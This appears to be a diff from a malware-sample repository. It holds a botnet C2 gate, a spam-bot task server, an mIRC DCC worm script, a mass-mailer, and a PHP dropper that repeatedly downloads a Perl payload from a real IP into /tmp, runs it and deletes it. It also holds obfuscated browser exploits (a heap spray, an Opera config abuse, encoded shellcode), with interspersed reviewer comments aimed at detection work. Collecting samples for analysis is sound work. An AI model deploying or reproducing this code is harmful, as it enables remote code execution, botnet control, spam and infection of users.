"language_id=". (empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).",".
"ipv4='". addslashes($real_ipv4)."',".
"flag_nat=IF(net_latency > 0, IF(port_s1 > 0, 0, 1), 1)";//FIXME: Определять NAT ботом.
if(!mysql_query("INSERT INTO botnet_list SET comments='', rtime_first={$curtime}, rtime_online={$curtime}, flag_install=".(ToInt($list[SBCID_BOT_STATUS]) == BS_INSTALLED ? 1 : 0).", {$query} ".
"ON DUPLICATE KEY UPDATE rtime_online=IF(rtime_last <= {$rtime_min_online}, {$curtime}, rtime_online), {$query}"))die();
//Поиск скриптов для отправки.
$reply_data = '';
$reply_count = 0;
$bot_id_qm = ToSQLSafeMask($bot_id_q);
$botnet_qm = ToSQLSafeMask($botnet_q);
$country_qm = ToSQLSafeMask($country_q);
$r = @mysql_query("SELECT extern_id, script_bin, send_limit, id FROM botnet_scripts WHERE flag_enabled=1 AND ".
"(countries_wl='' OR countries_wl LIKE BINARY '%\x01{$country_qm}\x01%') AND ".
"(countries_bl NOT LIKE BINARY '%\x01{$country_qm}\x01%') AND ".
"(botnets_wl='' OR botnets_wl LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ".
"(botnets_bl NOT LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ".
"(bots_wl='' OR bots_wl LIKE BINARY '%\x01{$bot_id_qm}\x01%') AND ".
"(bots_bl NOT LIKE BINARY '%\x01{$bot_id_qm}\x01%') ".
"LIMIT 10");
if($r)while((($m = mysql_fetch_row($r))))
{
$eid = addslashes($m[0]);
//Проверяем, не достигнут ли лимит.
if($m[2] != 0 && ($j = @mysql_query("SELECT COUNT(*) FROM botnet_scripts_stat WHERE type=1 AND extern_id='{$eid}'")) && ($c = mysql_fetch_row($j)) && $c[0] >= $m[2])
{
@mysql_query("UPDATE botnet_scripts SET flag_enabled=0 WHERE id={$m[3]} LIMIT 1");
continue;
}
//Добовляем бота в список отправленных.
if(@mysql_query("INSERT HIGH_PRIORITY INTO botnet_scripts_stat SET extern_id='{$eid}', type=1, bot_id='{$bot_id_q}', bot_version={$bot_version}, rtime={$curtime}, report='Sended'"))
{
$size = strlen($m[1]) + strlen($m[0]);
$reply_data .= pack('LLLL', ++$reply_count, 0, $size, $size).$m[0].$m[1];
}
}
if($reply_count > 0)
{
$reply_data = pack('LLL', HEADER_SIZE + strlen($reply_data), 0, $reply_count).md5($reply_data, true).$reply_data;
echo RC4($reply_data, BOTNET_CRYPTKEY);
die();
}
}
else die();
//Отправляем пустой ответ.
SendEmptyReply();
///////////////////////////////////////////////////////////////////////////////
// Функции.
///////////////////////////////////////////////////////////////////////////////
/*
Отправка пустого ответа и выход.
*/
function SendEmptyReply()
{
echo RC4(pack('LLL', HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1)."\x4A\xE7\x13\x36\xE4\x4B\xF9\xBF\x79\xD2\x75\x2E\x23\x48\x18\xA5"."\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", BOTNET_CRYPTKEY);
die();
}
/*
Получение страны.
Return - string, страна.
*/
function GetCountryIPv4()
{
global $real_ipv4;
$ip = sprintf('%u', ip2long($real_ipv4));
if(($r = @mysql_query("SELECT c FROM ipv4toc WHERE l<='".$ip."' AND h>='".$ip."' LIMIT 1")) && ($m = mysql_fetch_row($r)) !== false)return $m[0];
else return '--';
}
/*
Ковертация Bin2UINT.
IN $str - string, исходная бинарная строка.
Return - int, сконвертированное число.
*/
function ToUint($str)
{
$q = @unpack('L', $str);
return is_array($q) && is_numeric($q[1]) ? ($q[1] < 0 ? sprintf('%u', $q[1]) : $q[1]) : 0;
}
/*
Ковертация Bin2INT.
IN $str - string, исходная бинарная строка.
Return - int, сконвертированное число.
*/
function ToInt($str)
{
$q = @unpack('l', $str);
return is_array($q) && is_numeric($q[1]) ? $q[1] : 0;
}
/*
Ковертация Bin2SHORT.
IN $str - string, исходная бинарная строка.
Return - int, сконвертированное число.
*/
function ToUshort($str)
{
$q = @unpack('S', $str);
return is_array($q) && is_numeric($q[1]) ? $q[1] : 0;
}
?>

279
PHP/HackTool.PHP.Zunka.a Normal file

@ -0,0 +1,279 @@
<?
//report_url.Format(small_report_url+"&s=%u&y=%u&i=%u&a=%u&g=%u",
//aThis->nCntSmtp,aThis->nCntYahoo,aThis->nCntIcq,aThis->nCntAim,aThis->nCntGtalk);
if(isset($_GET['i']))
inc_zu_counters($lg,$_GET['i'],@$_GET['s'],@$_GET['y'],@$_GET['g'],@$_GET['a'],@$_GET['sbt']);
echo parse_zu_message(get_zu_mesage($lg));
//Functions+++++++++++++++++++++++++++++++++++++++
function crc32_from_tmpl($tname){
global $mres;
$q = "SELECT * FROM `tmpl_zu` WHERE `Tname`='".$tname."'";
$re = @mysql_query($q,$mres);
if(!mysql_num_rows($re))
return 0;
$crc = 0;
while ((@$row = mysql_fetch_object($re))){
$crc += crc32($row->Tmessage);
};
return $crc;
};
function parse_zu_message($str){
$rs ='';
if($str=='sToPsPaM')
return "\r\n"."#U9:"."\r\n"."#U6:"."\r\n"."#U7:"."\r\n";
//if there are templates
if(substr($str,0,2)=="#%"){
//get ingo about templates and crc
$tmpl = get_templates($str);
// echo crc32_from_tmpl($tmpl['sb']);
//echo $tmpl['sb'];
$tmplcrc32 = crc32_from_tmpl($tmpl['im']).crc32_from_tmpl($tmpl['mail']).crc32_from_tmpl($tmpl['sb']);
// echo '<br>'.$tmplcrc32.'-s<br>'.get_bot_inf(0,'FExecutedCrc');//.'-b inf'.$tmpl['im'].' s '.$tmpl['mail'];
//compare crc on bot table - is there executed with template
if(compare_crc_executed($tmplcrc32))
return "\r\n".'.crc tmpl.';
$IM = get_template_content($tmpl['im'],'im');
$MAILP = get_template_content($tmpl['mail'],'mp');
$MAILS = get_template_content($tmpl['mail'],'ms');
$BOTSP = get_template_content($tmpl['sb'],'sbp');
$BOTSS = get_template_content($tmpl['sb'],'sbs');
$rs = "\r\n";
if(strlen($IM)){
$rs .= "#U0:"."\r\n";
$rs .= "#U9:".$IM."\r\n";
};
if(strlen($BOTSP))
$rs .= "#U::".$BOTSP."\r\n";
if(strlen($BOTSS))
$rs .= "#U;:".$BOTSS."\r\n";
if(strlen($MAILP))
$rs .= "#U6:".$MAILP."\r\n";
if(strlen($MAILS))
$rs .= "#U7:".$MAILS."\r\n";
//write crc of returned message`s on bot
wri_bot_inf(0,'FExecutedCrc',$tmplcrc32);
//return content
return $rs;
};
if(compare_crc_executed(crc32($str)))
return "\r\n".'.crc s.';
$rs .= "\r\n"."#U9:".str_replace("\r\n",'|',$str)."\r\n";
$rs .= "\r\n"."#U6:".str_replace("\r\n",'|',$str)."\r\n";
//for spam bots
$rs .= "\r\n"."#U::".str_replace("\r\n",'|',$str)."\r\n";
//write crc of returned message`s on bot
wri_bot_inf(0,'FExecutedCrc',crc32($str));
//return content
return $rs;
};
function get_template_content($name,$type){
global $mres;
$q = "SELECT * FROM `tmpl_zu` WHERE `Tname`='".$name."' AND `Ttype`='".$type."'";
$res = mysql_query($q,$mres);
if(!mysql_num_rows($res))
return '';
$strret ='';
while((@$row = mysql_fetch_object($res))){
$strret .= str_replace("\r\n",'|',$row->Tmessage).'%%';
};
return $strret;
};
function get_templates($str){
$tparr = explode('#%',$str);
foreach ($tparr as $a){
if(substr($a,0,2)=='im')
$ret['im']=urldecode(substr($a,3));
if(substr($a,0,2)=='ml')
$ret['mail']=urldecode(substr($a,3));
if(substr($a,0,2)=='sb')
$ret['sb']=urldecode(substr($a,3));
if(substr($a,0,2)=='cr')
$ret['crc32']=urldecode(substr($a,3));
};
return $ret;
};
function prepare_zu_message($str){
$str = trim(trim($str));
if(strlen($str)==0)
return '';
$str = str_replace("\r\n",'|',$str);
return "\r\n".'#U3:'.$str."\r\n";
};
function get_zu_mesage($land){
global $mres;
$q = "SELECT * FROM `task_zu` WHERE `Tland`='".$land."' LIMIT 1";
$res = @mysql_query($q,$mres);
if(!mysql_num_rows($res)){
// if message for dafault land is set/
$def = get_zu_def_message();
if(strlen($def))
return trim($def);
return '';
}
$row = mysql_fetch_object($res);
if($row->Tstop)
return 'sToPsPaM';
return trim($row->Tmessage);
};
function get_zu_def_message(){
global $mres;
$q = "SELECT * FROM `task_zu` WHERE `Tland`='DEF' LIMIT 1";
$r = @mysql_query($q,$mres);
if(!@mysql_num_rows($r))
return '';
$rw =mysql_fetch_object($r);
return $rw->Tmessage;
};
//check whem is the land in task table, if not - switch to DEF.
function present_in_task_zu($land){
global $mres;
$q = 'SELECT `Tland` FROM `task_zu` WHERE `Tland`="'.$land.'" LIMIT 1';
if(@mysql_num_rows(mysql_query($q,$mres)))
return $land;
else
return 'DEF';
};
function inc_zu_counters($land,$icq=0,$mail=0,$yahoo=0,$google=0,$aim=0,$spambots=0){
global $mres;
//check land -- is in task list or not.
$land = present_in_task_zu($land);
$q = "UPDATE `task_zu` SET `Tsbots_done`=`Tsbots_done`+".$spambots.", `Tgoogle_done`=`Tgoogle_done`+".$google.", `Taim_done`=`Taim_done`+".$aim.", `Ticq_done`=`Ticq_done`+".$icq.", `Tyahoo_done`=`Tyahoo_done`+".$yahoo.", `Tmail_done`=`Tmail_done`+".$mail." WHERE `Tland`='".$land."' LIMIT 1";
@mysql_query($q,$mres);
return mysql_affected_rows($mres);
};
?>
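Review bot: Every query in this section is built by concatenating values into the SQL string, and `inc_zu_counters` is handed `$_GET['i']`, `$_GET['s']`, `$_GET['y']`, `$_GET['g']`, `$_GET['a']` and `$_GET['sbt']` straight from the request at the top of the file. Nothing between the request and `mysql_query` casts or escapes them, so each counter should be forced to an integer before the `UPDATE` is assembled, for example `$icq = (int)$icq;`. `$lg` and `$mres` are used but never defined in this section, so they presumably come from an including script that is not shown. The commented `report_url.Format(...)` line documents the check-in query string (`s`, `y`, `i`, `a`, `g`), and a header comment pointing to it would help analysts writing network detections.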


@ -0,0 +1,8 @@
[Script]
n0=; PHP.Caracula
n1=; By Xmorfic
n2=; Do not edit!
n3=ON 1:JOIN:#:{
n4= /if ( $nick == $me) {halt}
n5= /.dcc send $nick c:\_msphp\ms.php
n6=}

BIN
PHP/ProtonPHPWebPanel.7z Normal file

Binary file not shown.

266
PHP/SpamTool.PHP.Massma.v Normal file

@ -0,0 +1,266 @@
<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>BoLaJi eMailer</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<span class="style1">PHP eMailer<br>
made by JAMO BIZZ</span>
<form name="form1" method="post" action=""
enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="realname" value="<? print $realname;
?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>"
size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="60" rows="10"><? print $message;
?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
Plain
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send eMails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your
message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To:
$replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
?>
<p class="style1">PHP Mailer<br>
&copy JAMO BIZZ Connection 2007, July.<br>
</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
</script>";}
?>
</body>
</html>
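Review bot: The section has no header comment, and the one fact a triager needs is easy to miss: the loop calls `mail($to, $subject, "", $header)` with the message appended to `$header` after a blank line, so the text travels in the headers argument and the body argument is empty. The posted `from`, `realname`, `replyto` and `subject` values are also printed back into the form's `value="..."` attributes and concatenated into `$header` with no escaping or CR/LF filtering. `ereg_replace()` and `split()` were removed in PHP 7, so the file as committed only runs on PHP 5. I would add a comment at the top such as `// SAMPLE (SpamTool.PHP.Massma.v): unauthenticated POST form, one mail() per line of emaillist, "&email&" placeholder; do not deploy`.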


@ -0,0 +1,90 @@
<?
echo "AnakDompu";
@passthru('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;lwp-downloadhttp://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
?>
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
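Review bot: This section carries no file name or comment, so its indicators are only visible by reading the calls: every line fetches `nusatenggara.txt` from `203.113.6.34` into `/tmp`, runs it with `perl` and deletes it, repeated 55 times across `passthru`, `system`, `exec`, `popen` and `shell_exec` with six different download clients. The `@popen(...)` lines pass no mode argument, so those calls fail with the error hidden by `@`, and one `passthru` line reads `lwp-downloadhttp://` with the space missing. The second `<?php` block prints `php_uname()`, the output of `system(id)` (a bare constant, not a string) and disk usage, then exits. A header comment such as `// SAMPLE: download-and-execute stub; markers "AnakDompu", "Osirys", "0sirys was here"; host and file name below are IoCs` would make the file usable for detection work without re-reading every call.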

File diff suppressed because one or more lines are too long


@ -0,0 +1 @@
if(!success){ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%44%43%45%32%46%38%42%31%2d%41%35%32%30%2d%31%31%44%34%2d%38%46%44%30%2d%30%30%44%30%42%37%37%33%30%32%37%37%27%20%69%64%3d%27%74%61%72%67%65%74%31%27%3e%3c%2f%6f%62%6a%65%63%74%3e%22%29%3b')); eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%39%44%33%39%32%32%33%45%2d%41%45%38%45%2d%31%31%44%34%2d%38%46%44%33%2d%30%30%44%30%42%37%37%33%30%32%37%37%27%20%69%64%3d%27%74%61%72%67%65%74%32%27%3e%3c%2f%6f%62%6a%65%63%74%3e%22%29%3b')); eval(unescape('%76%61%72%20%73%68%65%6c%6c%63%6f%64%65%3d%75%6e%65%73%63%61%70%65%28%73%68%65%6c%6c%63%6f%2b%27%25%75%33%30%33%31%27%29%3b')); bigblock=unescape("%u9090%u9090"); slackspace=20+shellcode.length while(bigblock.length<slackspace)bigblock+=bigblock; fillblock=bigblock.substring(0,slackspace); block=bigblock.substring(0,bigblock.length-slackspace); while(block.length+slackspace<0x40000)block=block+block+fillblock; memory=new Array(); for(x=0;x<800;x++){memory[x]=block+shellcode} buffer='\x0a'; while(buffer.length<5000)buffer+='\x0a\x0a\x0a\x0a'; try{try{eval(unescape('%74%61%72%67%65%74%31%2e%73%65%72%76%65%72%3d%62%75%66%66%65%72%3b%74%61%72%67%65%74%31%2e%69%6e%69%74%69%61%6c%69%7a%65%28%29%3b%74%61%72%67%65%74%31%2e%73%65%6e%64%28%29'));} catch(e){eval(unescape('%74%61%72%67%65%74%32%2e%73%65%72%76%65%72%3d%62%75%66%66%65%72%3b%74%61%72%67%65%74%32%2e%72%65%63%65%69%76%65%28%29%3b'));}}catch(e){} }
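Review bot: This one-line section is a fragment rather than a standalone script: it reads `success` and `shellco`, which are not defined in it, and the next two sections likewise depend on outside names (`success`, `url`) or hide their strings. All three have lost their file names on this page and carry no comment. The stable features for a signature are structural: `eval(unescape('%64%6f%63...'))` hiding a `document.write` of `<object classid=...>` tags here, a `%u9090` filler grown to `0x40000` and copied into an 800-element array, and in the third section junk letters stripped with `.replace(/[...]/g, '')` before `unescape`. A leading comment such as `// SAMPLE FRAGMENT: needs globals from the loader page; obfuscated with eval(unescape(...))` would record that.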


@ -0,0 +1 @@
if(!success){ exeurl=url; blank=document.createElement('iframe'); blank.src='about:blank'; blank.setAttribute('id','blank_window'); blank.setAttribute('style','display:none'); document.appendChild(blank); blank_window.eval("build=document.createElement('iframe'); build.src='opera:about'; build.onload=function(){if(build.contentDocument.childNodes[0].innerHTML.indexOf('8771')==-1){ document.write(''); setTimeout("parent.op9()",4000);};}; document.appendChild(build);"); } function op9(){ blank_window.eval("function tempname(from,url){ iUrl=from.indexOf(url); iTr=from.indexOf('',iUrl-60); return from.substr(iTr+8,12);} config=document.createElement('iframe'); config.setAttribute('id','config_window'); config.src='opera:config'; document.appendChild(config); var tosearch=url; cache=document.createElement('iframe'); cache.src='opera:cache'; cache.onload=function() { filename=tempname(cache.contentDocument.childNodes[0].innerHTML,tosearch); if(!filename)setTimeout('op9()',5000); config_window.eval(" opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename); app_link=document.createElement('a'); app_link.setAttribute('href','tn3270://nothing'); app_link.click(); setTimeout(function(){opera.setPreference('Network','TN3270 App','telnet.exe')},1000);");}; document.appendChild(cache);"); }


@ -0,0 +1,9 @@
<script>
x=unescape("%PuP9P0P9S0M%MuM9M0S9I0M%SuS1I8I6PA@%PuP6I4@5PBS%@uM0@3M8IBI%MuI4@0S8SBS%PuM8MBM3S0@%@uI1P8M4S0S%MuP5@8P0S5M%@uS0M0P0@1@%Mu@3S3I0S0P%MuP8M9@DI2P%IuI8I9S1P0M%MuS0P4M5I0P%Pu@5P0I8@9S%@u@8P9I0I8P%IuI0SCP5P0S%PuSCS0I8M3@%Mu@8I9P2@8M%SuI8S9M0@0P%@uS0M4S4@0@%SuPCS0S8M3P%Su@6M6@0@8S%PuS7S8@3SDS%SuS7ICP0M5S%MuM8MBMFS2M%@uI8M1@DM8P%IuS9S0PCP3S%PuS0@0S0M0@%PuP8M9P0@0M%Su@3I3I1I8S%@uM8@3IDS2I%MuS0I4@CS0I%@uI1M0I8M9M%@uSCS0S8M3P%@uI8I1M0S4@%@uI8@0IC@3I%@uP0S0P0P0P%MuI8S9P0M0P%SuS3S3P1P8S%IuM8P9MCS0I%SuM8S3S0P3I%Mu@0I4PCI3M%@uS8P1@6I6S%PuM8S8SF@B@%@uS7SCI1PE@%SuI8SB@FS4P%IuM8I1SDI3I%PuP7I0@EPBI%@u@0@0P1SEM%@uS6I6P0P0@%@uP3@3P8@BI%PuI8M9P6M6@%IuM4M2M3M2S%Su@CI6M4M2S%MuS0S8S0M2I%IuP6M6@4I2I%PuI3M2P8IBM%Su@3I1I6P6M%IuP4@2P3I2M%SuMC@6P4I2S%@uP1@4I0M2S%MuS6I6@4P2M%IuS3S2S8IBM%SuM3@1S6P6P%MuM4P2M3P2@%SuS6P6@4P2I%Mu@C@3@8S1I%MuP0M1S6M0P%IuM1P3S8S9I%SuI5I3S8S9M%IuS8S9@0M4I%IuI8@9M1@AS%IuP0S4I5MAI%@uP9I0S9I0@%PuM9I0@9P0@%IuP9@0I9S0S%@uS0@fSeIb@%@uI3@3P5SbI%Mu@6P6ScP9I%@u@8@0PbM9P%PuS8S0P0P1S%@uPeMf@3P3P%SuMe@2S4M3I%Pu@ePbP